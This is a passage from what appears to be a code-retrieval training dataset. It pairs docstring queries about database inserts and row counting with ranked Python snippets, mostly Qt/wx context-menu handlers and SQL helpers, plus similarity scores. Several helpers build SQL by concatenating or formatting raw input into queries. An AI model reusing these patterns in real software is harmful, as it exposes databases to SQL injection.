menu.exec_(event.globalPos()) # show menu at mouse position", "def aboutToShowContextMenuEvent(self):\n\t\tpass", "def request_context_menu(self, pos):\n pass", "def _context_menu_make(self, pos):\n format = self._control.cursorForPosition(pos).charFormat()\n name = format.stringProperty(QtGui.QTextFormat.ImageName)\n if name:\n menu = QtGui.QMenu()\n\n menu.addAction('Copy Image', lambda: self._copy_image(name))\n menu.addAction('Save Image As...', lambda: self._save_image(name))\n menu.addSeparator()\n\n svg = self._name_to_svg_map.get(name, None)\n if svg is not None:\n menu.addSeparator()\n menu.addAction('Copy SVG', lambda: svg_to_clipboard(svg))\n menu.addAction('Save SVG As...',\n lambda: save_svg(svg, self._control))\n else:\n menu = super(RichJupyterWidget, self)._context_menu_make(pos)\n return menu", "def create_menus( self ):", "def create_menu():", "def contextMenuEvent(self,event):\n\t\tmenu=self.createStandardContextMenu ()\n\t\tmenu.addAction(self.actionLaunchCharWidgetTable)\n\t\tmenu.exec_(event.globalPos())", "def contextMenuEvent(self, event):\n menu = self.createStandardContextMenu()\n menu.removeAction(menu.actions()[0])\n menu.removeAction(menu.actions()[0])\n menu.insertSeparator(menu.actions()[0])\n menu.insertAction(menu.actions()[0], self.treeSelectAction)\n self.treeSelectAction.setEnabled(self.isChildView and\n len(self.toPlainText().strip()) > 0)\n menu.exec_(event.globalPos())", "def on_context_menu(self, event):\n self.declaration.context_menu_event()", "def misc_menu(self):\n # info needed to separate edit and view widgets in self.widget_classes\n name_test_current = [\n (\"Editor\", lambda x: x.lep_type == 'EDITOR', self.edit_widget.__class__),\n (\"Viewer\", lambda x: x.lep_type != 'EDITOR', self.view_widget.__class__),\n ]\n\n menu = QtWidgets.QMenu()\n for name, is_one, current in name_test_current:\n # list Editor widgets, then Viewer widgets\n for widget_class in [i for i in self.widget_classes if is_one(i)]:\n\n def cb(checked, widget_class=widget_class):\n self.set_widget(widget_class=widget_class)\n\n act = QAction(f\"{name}: {widget_class.lep_name}\", self)\n act.setCheckable(True)\n act.setChecked(widget_class == current)\n act.triggered.connect(cb)\n menu.addAction(act)\n\n button = self.control_menu_button\n point = button.position().toPoint() if isQt6 else button.pos() # Qt6 documentation is wrong.\n global_point = button.mapToGlobal(point)\n menu.exec_(global_point)", "def create_menu(self, parent):\n menu = QtGui.QMenu(parent=parent)\n return menu.menuAction()", "def createTabContextMenu(ned, tabIndex):\n pass", "def showContextMenu(self, event):\r\n menu = wx.Menu()\r\n menu.Append(wx.ID_OPEN, \"Open...\\tCtrl+O\", \"Open an image...\", )\r\n menu.Append(wx.ID_SAVE, \"Save\\tCtrl+S\", \"Save the cropped image...\")\r\n menu.AppendSeparator()\r\n menu.Append(wx.ID_ABOUT, \"About\\tCtrl+I\", \"About this program...\")\r\n\r\n menu.Bind(wx.EVT_MENU, self.showOpenImageDialog, id=wx.ID_OPEN)\r\n menu.Bind(wx.EVT_MENU, self.saveImage, id=wx.ID_SAVE)\r\n menu.Bind(wx.EVT_MENU, self.showAboutDialog, id=wx.ID_ABOUT)\r\n\r\n self.PopupMenu(menu, event.GetPosition())\r\n menu.Destroy()", "def menuItem(*args):\n\toptionsWindow()", "def createContextMenu(self, point):\n\n networkNode = self.returnNetworkNode\n mirror = cmds.getAttr(networkNode + \".mirrorModule\")\n\n # icons\n icon_copy = QtGui.QIcon(os.path.join(self.iconsPath, \"System/copy.png\"))\n icon_paste = QtGui.QIcon(os.path.join(self.iconsPath, \"System/paste.png\"))\n icon_reset = QtGui.QIcon(os.path.join(self.iconsPath, \"System/reset.png\"))\n icon_delete = QtGui.QIcon(os.path.join(self.iconsPath, \"System/delete.png\"))\n icon_mirror = QtGui.QIcon(os.path.join(self.iconsPath, \"System/mirrorXforms.png\"))\n icon_createMirror = QtGui.QIcon(os.path.join(self.iconsPath, \"System/createMirror.png\"))\n\n # create the context menu\n if networkNode != \"ART_Root_Module\":\n self.contextMenu = QtWidgets.QMenu()\n self.contextMenu.addAction(icon_copy, \"Copy Settings\", self.copySettings)\n self.contextMenu.addAction(icon_paste, \"Paste Settings\", self.pasteSettings)\n self.contextMenu.addAction(icon_reset, \"Reset Settings\", self.resetSettings)\n\n self.contextMenu.addSeparator()\n if mirror != None:\n self.contextMenu.addAction(icon_mirror, \"Mirror Transformations to \" + mirror,\n self.mirrorTransformations)\n\n self.contextMenu.addAction(icon_createMirror, \"Create Mirror of this Module\", self.createMirrorOfModule_UI)\n self.contextMenu.addSeparator()\n\n self.contextMenu.addAction(icon_delete, \"Delete Module\", self.deleteModule)\n self.contextMenu.exec_(self.groupBox.mapToGlobal(point))", "def onContextMenu(self, event):\n # Skipping the save state functionality for release 0.9.0\n # return\n pos = event.GetPosition()\n pos = self.ScreenToClient(pos)\n self.PopupMenu(self.popUpMenu, pos)", "def get_context_menu(self, qpoint):\n menu = QMenu(self)\n index = self.view.indexAt(qpoint)\n\n def add_action(menu, text, handler, icon=None):\n a = None\n if icon is None:\n a = QAction(text, self)\n else:\n a = QAction(icon, text, self)\n a.triggered.connect(handler)\n menu.addAction(a)\n\n add_action(menu, \"Color selection\", self._handle_color_selection)\n\n # duplication here with vstructui\n color_menu = menu.addMenu(\"Color selection...\")\n\n # need to escape the closure capture on the color loop variable below\n # hint from: http://stackoverflow.com/a/6035865/87207\n def make_color_selection_handler(color):\n return lambda: self._handle_color_selection(color=color)\n\n for color in QT_COLORS:\n add_action(color_menu, \"{:s}\".format(color.name),\n make_color_selection_handler(color.qcolor), make_color_icon(color.qcolor))\n\n start = self._hsm.start\n end = self._hsm.end\n cm = self.getColorModel()\n if (start == end and cm.is_index_colored(start)) or cm.is_region_colored(start, end):\n def make_remove_color_handler(r):\n return lambda: self._handle_remove_color_range(r)\n\n remove_color_menu = menu.addMenu(\"Remove color...\")\n for cr in cm.get_region_colors(start, end):\n pixmap = QPixmap(10, 10)\n pixmap.fill(cr.color)\n icon = QIcon(pixmap)\n add_action(remove_color_menu,\n \"Remove color [{:s}, {:s}], len: {:s}\".format(h(cr.begin), h(cr.end), h(cr.end - cr.begin)),\n make_remove_color_handler(cr), make_color_icon(cr.color))\n\n menu.addSeparator() # -----------------------------------------------------------------\n\n add_action(menu, \"Copy selection (binary)\", self._handle_copy_binary)\n copy_menu = menu.addMenu(\"Copy...\")\n add_action(copy_menu, \"Copy selection (binary)\", self._handle_copy_binary)\n add_action(copy_menu, \"Copy selection (text)\", self._handle_copy_text)\n add_action(copy_menu, \"Copy selection (hex)\", self._handle_copy_hex)\n add_action(copy_menu, \"Copy selection (hexdump)\", self._handle_copy_hexdump)\n add_action(copy_menu, \"Copy selection (base64)\", self._handle_copy_base64)\n\n menu.addSeparator() # -----------------------------------------------------------------\n\n add_action(menu, \"Add origin\", lambda: self._handle_add_origin(index))\n return menu", "def about_right_click(event):\n popup_menu = Menu(tearoff=0)\n popup_menu.add_command(label='Copy')\n\n popup_menu.post(event.x_root, event.y_root)", "def contextMenuEvent(self, event):\n menu = QtWidgets.QMenu(self)\n\n menu.addAction(cuegui.Action.create(self,\n \"Select matching jobs (Enter)\",\n \"Select matching jobs\",\n self._actionSelect))\n\n menu.addAction(cuegui.Action.create(self,\n \"Clear\",\n \"Clear text\",\n self.actionClear))\n\n menu.exec_(QtCore.QPoint(event.globalX(), event.globalY()))", "def Build(self, context, contextCallback=None, parent=None):\n # type: (MenuContext, Optional[Callable], Optional[QtWidgets.QWidget]) -> Optional[QtWidgets.QMenu]\n menu = QtWidgets.QMenu(self.name, parent)\n for action in self.actions:\n action.AddToMenu(menu, context, contextCallback=contextCallback)\n if not menu.isEmpty():\n return menu", "def request_context_menu(self, pos):\n super(ItemListView, self).request_context_menu(pos)\n self.get_selected()\n self.manage_actions()\n self.display_context_menu(pos)", "def _contextMenu(self, pos):\n # Create the context menu\n menu = qt.QMenu(self)\n menu.addAction(self._zoomBackAction)\n if self.isRightAxisVisible:\n menu.addMenu(self._zoomEnabledAxesMenu)\n menu.addSeparator()\n menu.addAction(self._crosshairAction)\n\n plotArea = self.getWidgetHandle()\n globalPosition = plotArea.mapToGlobal(pos)\n menu.exec(globalPosition)", "def makeActionMenu(self):\n\t\tself.newAct = QtGui.QAction(self.tr(\"&Novo\"),self)\n\t\tself.newAct.setShortcut(self.tr(\"Ctrl+N\"))\n\t\tself.newAct.setStatusTip(self.tr(\"Cria uma nova area de desenho em branco\"))\n\t\tself.connect(self.newAct,SIGNAL(\"triggered()\"),self.glwidget.newFile)\n\t\t\n\t\tself.openAct = QtGui.QAction(self.tr(\"&Abrir\"),self)\n\t\tself.openAct.setShortcut(self.tr(\"Ctrl+o\"))\n\t\tself.openAct.setStatusTip(self.tr(\"Abrir arquivo do elvis\"))\n\t\tself.connect(self.openAct,SIGNAL(\"triggered()\"),self.glwidget.openElvisfile)\t\t\n\n\t\tself.saveAct = QtGui.QAction(self.tr(\"&Salvar\"),self)\n\t\tself.saveAct.setShortcut(self.tr(\"Ctrl+S\"))\n\t\tself.saveAct.setStatusTip(self.tr(\"Salva a imagem do canvas\"))\n\t\tself.connect(self.saveAct,SIGNAL(\"triggered()\"),self.glwidget.saveElvisfile)\n\t\t\n\t\tself.exportAct = QtGui.QAction(self.tr(\"&Exportar SVG\"),self)\n\t\tself.exportAct.setShortcut(self.tr(\"Ctrl+E\"))\n\t\tself.exportAct.setStatusTip(self.tr(\"Exporta para formato SVG\"))\n\t\tself.connect(self.exportAct,SIGNAL(\"triggered()\"),self.glwidget.ExportSVG)\n\t\t\t\t\n\t\t\n\t\tself.exitAct = QtGui.QAction(self.tr(\"&Sair\"),self)\n\t\tself.exitAct.setStatusTip(self.tr(\"Sair do programa\"))\n\t\tself.connect(self.exitAct,SIGNAL(\"triggered()\"),self.close)\n\t\t\n\t\n\t\tself.aboutAct = QtGui.QAction(self.tr(\"&Sobre\"),self)\n\t\tself.aboutAct.setStatusTip(self.tr(\"Sobre o programa\"))\n\t\tself.connect(self.aboutAct,SIGNAL(\"triggered()\"),self.about)", "def _addMenu(self):\n self.action = QAction(QIcon(), 'WakaTime', self)\n self.action.triggered.connect(self._promptForApiKey)\n fileMenu = e5App().getObject('UserInterface').getMenu('file')\n fileMenu.addAction(self.action)", "def origin_context_menu(self, context):\n self.layout.separator()\n self.layout.operator(\"object.quick_set_origin\")", "def __handleShowContextMenu(self, coord):\n coord = self.mapToGlobal(coord)\n self.__menu.popup(coord)" ]
[ "0.7556599", "0.74964786", "0.7235469", "0.714675", "0.6928441", "0.6839094", "0.68082815", "0.6805799", "0.68024814", "0.6796827", "0.6790282", "0.677154", "0.676619", "0.6764652", "0.67637086", "0.67262745", "0.6709449", "0.66774523", "0.6611824", "0.6609954", "0.6595786", "0.6540596", "0.6520664", "0.6474391", "0.64730245", "0.6472471", "0.6394035", "0.63854706", "0.63782495", "0.6375136" ]
0.77636343
0
Inputs values to table in database.
def input_values(curs, table_name, inputs): curs.executemany("""INSERT INTO {} (s, x, y) VALUES (?, ?, ?);""".format(table_name), inputs)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def insert_values():\n pass", "def insertByHand(self):\n\n fieldValues = []\n for field in self.fieldNames:\n fieldValues.append(raw_input(\"Give \" + field + \": \"))\n\n print(self.tableName + \".insert(\" + str(fieldValues) + \")\")\n\n self.insert(fieldValues)", "def insertData(table, column, input):\n\ttry:\n\t\tcon = sqlite3.connect('PampDb.db')\n\t\tcur = con.cursor()\n\t\tcur.execute(\"INSERT INTO '\" + table + \"' (\" + column + \") VALUES ('\" + input + \"')\")\n\t\tcon.commit()\n\t\tcon.close()\n\texcept:\n\t\tprint('Could not run function insertData from DbController')", "def insert(self,table,values):\n self.connect.execute(self.insert_disc[table],values)\n self.connect.commit()", "def do_update_data(self, *args):\n print(\"Provide data to update :\")\n id_field = dict()\n id_field['id'] = input(\"Provide id to update :\")\n values = {**id_field, **self.__class__.populate_data()}\n self.connection_obj.update_into_table(**values)\n print(\"Data Update Successful\")", "def do_insert_data(self, *args):\n print(\"Provide data to insert\")\n self.connection_obj.insert_into_table(**self.__class__.populate_data())\n print(\"Data Insertion Successful\")", "def add_entry(db, table, columns, values):\n mycursor = db.cursor()\n\n sql = \"INSERT INTO \" + table + \" (\" + parse_sql_param_from_array(columns) + \") VALUES (\" + parse_sql_param_from_array(values, escape=True) + \")\"\n mycursor.execute(sql)\n\n db.commit()", "def populate_table(database, table, data):\n\n for row in data:\n database.session.add(table(row))\n database.session.commit()", "def populate_table(self, data):\n\n db = self.connection(database=\"imdb\")\n\n try:\n cur = db.cursor()\n sql = \"\"\"\n INSERT INTO film (title, film_id, year, director, cast, rating, poster_url) \n VALUES (%s, %s, %s, %s, %s, %s, %s);\n \"\"\"\n cur.execute(sql, data)\n db.commit()\n except:\n print(\"An error occurred when saving the data!\")\n\n db.close()", "def add(self):\n try:\n self.active_table.add_row(Row.Row([obj.get() for obj in self.enter_values]))\n self.parent.display_content()\n self.master.withdraw()\n except UnableToCastException as err:\n messagebox.showerror(\"Error\", err)", "def insert_to_table(self, tableName, dataRow, colNames):\n queryString = f\"INSERT INTO {tableName} VALUES \"\n # building the Values list\n valueString = \"\"\n # looping \n for value in dataRow:", "def add_entry(self, table_name, values):\n with self.connection.cursor() as cursor:\n result = cursor.execute(self.get_select_mysql_command(**DialogueDbHelper.MYSQL_ARGUMENTS[table_name]), values)\n if result is 0:\n cursor.execute(self.get_insert_mysql_command(**DialogueDbHelper.MYSQL_ARGUMENTS[table_name]), values)\n cursor.execute(self.get_select_mysql_command(**DialogueDbHelper.MYSQL_ARGUMENTS[table_name]), values)\n self.connection.commit()\n return cursor.fetchone()[0]", "def insert_row(self, tablename, fields):\n insert_params = \"(\" + \",\".join(['?' for x in fields]) + \")\"\n self.cursor.execute(\"insert into \" + tablename + \" values \" +\n insert_params, fields)", "def update(table, id_):\n\n # your code\n key = common.check_for_key(id_,table)\n if key == None:\n ui.print_error_message('Key does not exist')\n else:\n return_inputs = ui.get_inputs(['Name', 'Age'], 'Enter New Values')\n modif_index = key\n\n table[modif_index][NAME] = return_inputs[FIRST_PROP]\n table[modif_index][AGE] = return_inputs[SECOND_PROP]\n data_manager.write_table_to_file('hr/persons.csv', table) \n\n return table", "def run(self):\n self.db.table('points').insert({\n 'name': 'biblioteca',\n 'rfid': '123456'\n })", "def db_values(self, db):", "def run_insert_example():\n table = \"actors\"\n insert_values = {\n 'id': 3,\n 'name': \"Matt\",\n 'last_name': \"Smith\",\n 'country': \"England\"}\n print querify.insert_from_dict(table, insert_values)\n\n insert_col_list = [\"id\", \"name\", \"last_name\", \"country\"]\n insert_val_list = [\n [1, \"Chris\", \"Eccleston\", \"England\"],\n [2, \"David\", \"Tennant\", \"Scotland\"],\n [3, \"Matt\", \"Smith\", \"England\"]]\n print querify.insert_from_list(table, insert_col_list, insert_val_list)", "async def add_entry(self, **values):\r\n query = \"INSERT OR IGNORE INTO {table_name} ({table_headers}) VALUES({entry_values})\"\r\n\r\n headers = \", \".join([e for e in values.keys()])\r\n entry_val = \", \".join(\"?\"*len(values.values()))\r\n attrs = [e for e in values.values()]\r\n\r\n query = query.format(table_name = self.name, table_headers=headers, entry_values=entry_val)\r\n\r\n await self.data.db.execute(query, attrs)\r\n await self.data.db.commit()", "def _store_entry_in_table(conn, table_name, entry):\n # Create entry insertion template.\n template = ('?, ' * len(entry)).rstrip(', ') # \"?\" for each value\n template = '(%s)' % template # enclose in parentheses\n # Try to insert a new row into the table.\n with conn:\n cur = conn.cursor()\n cur.execute('INSERT INTO %s VALUES%s' % (table_name, template), entry)", "def form(self, table, column, info):\n info = info.replace(\" \",\"\")\n data = info.split(',')\n value = \"'\" + data[0]\n for i in xrange(1, len(data)):\n value = value + \"', '\" + data[i]\n value = value + \"'\"\n\n if self.type == \"select\":\n statement = \"\"\"SELECT * FROM %s WHERE %s=%s\"\"\" %(table, column, value)\n return statement\n elif self.type == \"insert\":\n statement = \"\"\"INSERT INTO %s(%s) VALUES(%s)\"\"\" %(table, column, value)\n return statement\n elif self.type == \"update\":\n statement = \"\"\"UPDATE %s SET %s='%s' WHERE %s='%s'\"\"\" %(table, column, data[0], column, data[1])\n return statement", "def insert_values(self, table, cols, vals):\n conn = psycopg2.connect(self.name, sslmode='require')\n c = conn.cursor()\n c.execute(\"INSERT INTO {0} ({1}) VALUES ({2})\".format(table,','.join(str(i) for i in cols), ','.join(\"'\"+str(i)+\"'\" for i in vals)))\n conn.commit() \n conn.close", "def saveData(self,event=None):\r\n self.checkTitle()\r\n self.checkAffiliation()\r\n\r\n checkCur = self.dbConn.execute(\r\n \"SELECT * FROM People WHERE Firstname = ? AND Lastname=?\",\r\n [self.first.getVal(),self.last.getVal()])\r\n res = checkCur.fetchall()\r\n if len(res)==0: \r\n sqlStr = str.format(\"INSERT INTO {} ({}) VALUES ({})\",\r\n self.dataTable,\",\".join(self.dataCols),\"?\"+\",?\"*(len(self.dataCols)-1))\r\n cur = self.dbConn.execute(sqlStr,self.getData())\r\n self.dbConn.commit()\r\n else:\r\n for person in res:\r\n print(str.format(\"{} {} works for {}\",\r\n person[\"Firstname\"],person[\"Lastname\"],person[\"affiliation\"]))\r\n\r\n self.first.setVal(\"\"),\r\n self.middle.setVal(\"\"),\r\n self.last.setVal(\"\"),\r\n self.suffix.setVal(\"\"),\r\n self.phone.setVal(\"\"),\r\n self.ext.setVal(\"\"),\r\n self.email.setVal(\"\")", "def add(table):\n\n # your code\n\n \n \n\n return_inputs = ui.get_inputs(['Name', 'Year'],\"Please enter a new record.\")\n key = str(common.generate_random(table))\n table.append([key,return_inputs[FIRST_PROP] , str(return_inputs[SECOND_PROP])])\n data_manager.write_table_to_file('hr/persons.csv', table)\n\n\n return table", "def sit(self, table):\n self.table = table", "def insertData(self, table, title, rating, authorinfo, pubinfo):\n\n\t\tsql = \"insert into %s (bookname, authorinfo, pubinfo, rating) \\\n\t\t\tvalues('%s', '%s', '%s', '%s')\" %(table, title, authorinfo,\n\t\t\tpubinfo, rating)\n\t\ttry:\n\t\t\tself.cursor.execute(sql)\n\t\t\tself.conn.commit()\n\t\texcept Exception, e:\n\t\t\tsys.exit()", "def add_to_database():\n db_conn.execute(\"INSERT INTO Fietsenstalling (Naam, Achternaam, Adress, FietsNr, PIN) VALUES \"\n \"(?, ?, ?, ?, ?);\",(Naam, Achternaam, Adress, FietsNr, PIN))\n\n db_conn.commit()", "def add(table):\n\n # your code\n row = []\n row.append(common.generate_random(table))\n\n inputs = ui.get_inputs([\"TITLE: \", \"MANUFACTURER: \", \"PRICE: \", \"STOCK: \"], \"Fill the records below: \")\n for i in inputs:\n row.append(i)\n\n table.append(row)\n\n return table", "def form_insert_query(self, table_name, input_data, table_fields_names=None, table_fields_types=None):\n\n\t\t# creating first part of the query -> section with columns' names\n\t\tquery_table_structure = self.build_query_part(table_fields_names, table_fields_types, query_part=1)\n\n\t\t# creating second part of the query -> section with values\n\t\tquery_values = self.build_query_part(input_data, table_fields_types, query_part=2)\n\t\t\n\t\t# form query\n \t\tquery = 'INSERT INTO ' + table_name + ' ' + query_table_structure + ' VALUES ' + query_values\n\n\t\treturn query", "def insert(self, table, value):\n col_name = self.table_cols[table][1:]\n sql = \"INSERT INTO %s(%s) VALUES (%s)\" % (table, str(','.join(col_name)), array_join(value, ','))\n Log.debug('DB -> %s' % sql)\n self.execute(sql)", "def __insert_row_column_module(self,\n table_name,\n form_data,\n description_id):\n\n select = Select(self.db)\n column_names = select.read_column_names(table_name)\n\n number_of_rows = form_data.get(\"numberOf\" + table_name, 0)\n if int(number_of_rows) == 0:\n return 0\n\n for row_num in range(1, int(number_of_rows)+1):\n sql_values = {}\n sql_statement = []\n sql_fields = []\n alt_sql_statement = []\n alt_sql_fields = []\n\n sql_statement.append(\"INSERT INTO \" + table_name + \" SET \")\n alt_sql_statement.append(\"INSERT INTO \" + table_name + \" SET \")\n sql_fields.append(\"`Description_ID`=:description_id\")\n alt_sql_fields.append(\"`Description_ID`=%(description_id)s\")\n sql_values['description_id'] = description_id\n\n for k in column_names:\n field_name = k[0] + \"_###_\" + str(row_num)\n if not form_data.get(field_name):\n continue\n\n value = form_data.get(field_name)\n if k[0].find(\"_ID\") < 0 and value:\n key = k[0]\n key = key.replace(\"(\", \"\")\n key = key.replace(\")\", \"\")\n key = key.replace(\":\", \"\")\n key = key.replace(\"%\", \"\")\n sql_fields.append(\"`\" + k[0] + \"`=:\" + key.lower())\n alt_sql_fields.append(\"`\" + k[0] + \"`=%(\" + key.lower() + \")s\")\n sql_values[key.lower()] = value.strip()\n\n sql_statement.append(\",\".join(sql_fields))\n alt_sql_statement.append(\",\".join(alt_sql_fields))\n\n session = self.db_conn.cursor(raw=True)\n try:\n #print(\"\".join(alt_sql_statement) % sql_values)\n session.execute(\"\".join(alt_sql_statement), sql_values)\n self.db_conn.commit()\n #print(\"SQL: \" + session.statement)\n except Exception as e:\n #print(\"ERROR: \" + str(e))\n try:\n # may be there is a spl char in the sql stmt\n # using connection().execute will not quote the sql stmt\n # and some messy hack is needed to avoid param execution\n sql_stmt = \" \".join(alt_sql_statement)\n sql_stmt = sql_stmt.replace(\"(%)\", \"(##)\")\n sql_stmt = sql_stmt.replace(\"%_\", \"##_\")\n sql_stmt = sql_stmt % sql_values\n sql_stmt = sql_stmt.replace(\"(##)\", \"(%)\")\n sql_stmt = sql_stmt.replace(\"##_\", \"%_\")\n #print(\"ALT SQL:\")\n #print(sql_stmt)\n session.execute(sql_stmt)\n self.db_conn.commit()\n except Exception:\n #session.rollback()\n raise\n finally:\n session.close()\n\n return 1" ]
[ "0.66245425", "0.6569825", "0.65506077", "0.6475767", "0.62920696", "0.6261432", "0.62417054", "0.60498255", "0.6047792", "0.60193795", "0.59682614", "0.5960599", "0.59450805", "0.5943396", "0.59352744", "0.5807773", "0.5787951", "0.5777822", "0.5770113", "0.57534796", "0.57456434", "0.57408583", "0.57232106", "0.57042193", "0.5688866", "0.56850475", "0.56806856", "0.56649005", "0.5663384", "0.5620644" ]
0.68125886
0
Queries to find number of rows in table in database where x is greater than or equal to x_gte and y is greater than or equal to y_gte.
def count_rows_greater(curs, table_name, x_gte=5, y_gte=5): assert x_gte is not None and y_gte is not None where_str = "" val = None if x_gte is None: where_str = "WHERE y >= ?" val = (y_gte) elif y_gte is None: where_str = "WHERE x >= ?" val = (x_gte) else: where_str = "WHERE x >= ? AND y >= ?" val = (x_gte, y_gte) return curs.execute("""SELECT COUNT(*) FROM {} {};""".format(table_name, where_str), val).fetchone()[0]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def rpc_database_count_rows(self, *args):\n\t\targs = list(args)\n\t\tfields = self.path.split('/')[1:-2]\n\t\tassert len(fields) == len(args)\n\t\ttable = DATABASE_TABLE_OBJECTS.get(self.path.split('/')[-2])\n\t\tassert table\n\t\tsession = db_manager.Session()\n\t\tquery = session.query(table)\n\t\tquery = query.filter_by(**dict(zip((f + '_id' for f in fields), args)))\n\t\tresult = query.count()\n\t\tsession.close()\n\t\treturn result", "def howmany_within_range(row, minimum, maximum):\n count = 0\n for n in row:\n if minimum <= n <= maximum:\n count = count + 1\n return count", "def query_range(tree, start_y, start_x, end_y, end_x):\n res = 0\n start_y -= 1\n\n while end_y > start_y:\n res += bit.query_range(tree[end_y], start_x, end_x)\n end_y -= (end_y & -end_y)\n\n while start_y > end_y:\n res -= bit.query_range(tree[start_y], start_x, end_x)\n start_y -= (start_y & -start_y)\n\n return res", "def test_query_hits(config):\n psp = PostgreSQLProvider(config)\n results = psp.query(resulttype=\"hits\")\n assert results[\"numberMatched\"] == 14776\n\n results = psp.query(\n bbox=[29.3373, -3.4099, 29.3761, -3.3924], resulttype=\"hits\")\n assert results[\"numberMatched\"] == 5\n\n results = psp.query(properties=[(\"waterway\", \"stream\")], resulttype=\"hits\")\n assert results[\"numberMatched\"] == 13930", "async def count_rows(self, query: str, args: Optional[Iterable]=None) -> float:\n res = await self.fetch_all(query, args)\n return len(res)", "def interval_query(cur, table, start, num_rows):\n nresults = cur.execute(\"\"\"SELECT * FROM {} LIMIT {},{}\"\"\".format(table, start, num_rows))\n return nresults, cur", "def test_query_expression_count(self):\r\n assert self.table.objects.count() == 12\r\n\r\n q = self.table.objects(self.table.column('test_id') == 0)\r\n assert q.count() == 4", "def num_older_than(age: float) -> int:\r\n cur = con.cursor()\r\n count_older = cur.execute(\r\n \"\"\"SELECT COUNT(Patient_ID)\r\n FROM Patient\r\n WHERE (JULIANDAY('now') - JULIANDAY(Date_Of_Birth)) / ? > ?\"\"\",\r\n [DAYS_IN_YEAR, age],\r\n ).fetchall()\r\n\r\n return count_older[0][0]", "def get_num_tiles(grid_bbox, dxy): \r\n xmin, xmax, ymin, ymax = grid_bbox\r\n return (int(np.abs(ymax-ymin)/dxy), int(np.abs(xmax-xmin)/dxy))", "def test_rows_removed_greater_than_unsent_removed():\n stmt = sqlalchemy.select([_LOGGING_TABLE.c.total_rows_removed,\n _LOGGING_TABLE.c.total_unsent_rows_removed]).select_from(_LOGGING_TABLE).order_by(\n _LOGGING_TABLE.c.id)\n\n result = execute_command_with_return_value(stmt)\n assert [value[0] >= value[1] for value in result]", "def count_alive_cells(self, x, y):\n\n # indices of surrounding cells.\n ul = max(y - 1, 0) # upper left\n ur = min(y + 2, self.f_shape[1]) # upper right\n bl = max(x - 1, 0) # bottom left\n br = min(x + 2, self.f_shape[0]) # bottom right\n\n # slice\n cells = self.cells[bl:br, ul:ur]\n n_cells = np.count_nonzero(cells)\n\n return n_cells - self.cells[x][y]", "def count(self, table, field, condition, *parameters, **kwparameters):\n table = self.prefix + table\n field = 'COUNT(' + field + ') AS rows_count'\n query = \"SELECT \" + field + \" FROM \" + table + \" \" + condition\n rows_count = self.query(query, *parameters, **kwparameters)\n if rows_count:\n return int(rows_count[0][\"rows_count\"])\n else:\n return 0", "def rangeQuery(self, x):\n \n neighbors = []\n \n for y in range(len(self.df)):\n q = self.df[y, :2]\n if self.dist(x, q) <= self.epsilon:\n neighbors.append(y)\n \n return neighbors", "def count(self):\n return self.query.count(with_limit_and_skip = True)", "def test_apply_filter_geq(app):\n with app.app_context():\n users = User.query\n users = apply_filter(users, User,\n {'column': 'id', 'type': 'geq',\n 'value': '1'})\n assert str(users.whereclause) == 'users.id >= :id_1'", "def getHits(self, timestamp):\n hit = 0\n for i in self.l:\n if i<=timestamp and i>timestamp-300:\n hit += 1\n return hit", "def rectangles_in_grid(x_f, y_f):\n count = 0\n for x in range(x_f):\n for y in range(y_f):\n for i in range(x, x_f):\n for j in range(y, y_f):\n count += 1\n return count", "def test_counts(pawprint_default_tracker_db_with_table):\n\n tracker = pawprint_default_tracker_db_with_table\n\n # Add a bunch of events\n query = (\n \"\"\"\n INSERT INTO {} (timestamp, user_id, event) VALUES\n ('2016-01-01 12:30', 'alice', 'logged_in'),\n ('2016-01-01 12:40', 'bob', 'logged_in'),\n ('2016-01-01 16:00', 'charlotte', 'logged_in'),\n ('2016-01-02 00:00', 'dan', 'logged_in'),\n ('2016-01-02 00:00', 'elizabeth', 'logged_in'),\n ('2016-01-05 00:00', 'frank', 'logged_in'),\n ('2016-01-10 00:00', 'gabrielle', 'logged_in'),\n ('2016-01-20 00:00', 'hans', 'logged_in'),\n ('2016-02-01 00:00', 'iris', 'logged_in'),\n ('2016-02-01 00:00', 'james', 'logged_in'),\n ('2016-03-01 00:00', 'kelly', 'logged_in'),\n ('2016-03-01 00:00', 'laura', 'logged_in'),\n ('2016-03-01 00:00', 'mike', 'not_logged_in')\n \"\"\"\n ).format(tracker.table)\n\n pd.io.sql.execute(query, tracker.db)\n\n logins_hourly = tracker.count(event=\"logged_in\", resolution=\"hour\")\n logins_daily = tracker.count(event=\"logged_in\")\n logins_weekly = tracker.count(event=\"logged_in\", resolution=\"week\")\n logins_monthly = tracker.count(event=\"logged_in\", resolution=\"month\")\n logins_weekly_left_range = tracker.count(\n event=\"logged_in\", resolution=\"week\", start=datetime(2016, 2, 1)\n )\n logins_weekly_right_range = tracker.count(\n event=\"logged_in\", resolution=\"week\", end=datetime(2016, 2, 1)\n )\n logins_daily_full_range = tracker.count(\n event=\"logged_in\", start=datetime(2016, 1, 15), end=datetime(2016, 2, 15)\n )\n\n # Hourly\n assert len(logins_hourly) == 8\n assert np.all(logins_hourly[\"count\"].values == [2, 1, 2, 1, 1, 1, 2, 2])\n\n # Daily\n assert len(logins_daily) == 7\n assert np.all(logins_daily[\"count\"].values == [3, 2, 1, 1, 1, 2, 2])\n\n # Weekly\n assert len(logins_weekly) == 5\n assert np.all(logins_weekly[\"count\"].values == [5, 2, 1, 2, 2])\n\n # Others\n assert len(logins_monthly) == 3\n assert len(logins_weekly_left_range) == 2 # weeks start on Monday\n assert len(logins_weekly_right_range) == 4 # and not at the start / end dates provided\n assert len(logins_daily_full_range) == 2", "def count(self, query):", "def _get_hit_count(self, database, enquire):\n return self._get_enquire_mset(\n database, enquire, 0, database.get_doccount()\n ).size()", "def getVisibleRows(self, y1, y2):\n start = self.getRowPosition(y1)\n end = self.getRowPosition(y2) + 1\n if end > self.rows:\n end = self.rows\n return start, end", "def query_four(self, table_name):\n\n query = (\n \"SELECT user_id, COUNT(*) as NumActivites \"\n \"FROM %s \"\n \"WHERE DATEDIFF(start_date_time, end_date_time) = -1 \"\n \"GROUP BY user_id \"\n )\n\n self.cursor.execute(query % (table_name))\n rows = self.cursor.fetchall()\n print(tabulate(rows, headers=self.cursor.column_names))\n return rows", "def compute(self, check_range=(None, None)):\n\n self.check_since, self.check_until = check_range\n\n df = self.df\n\n if self.check_since is not None:\n df = df[df['created_date'] < self.check_since]\n\n if self.check_until is not None:\n df = df[df['created_date'] >= self.check_until]\n\n count_new_committers = len(df.index)\n return count_new_committers", "def 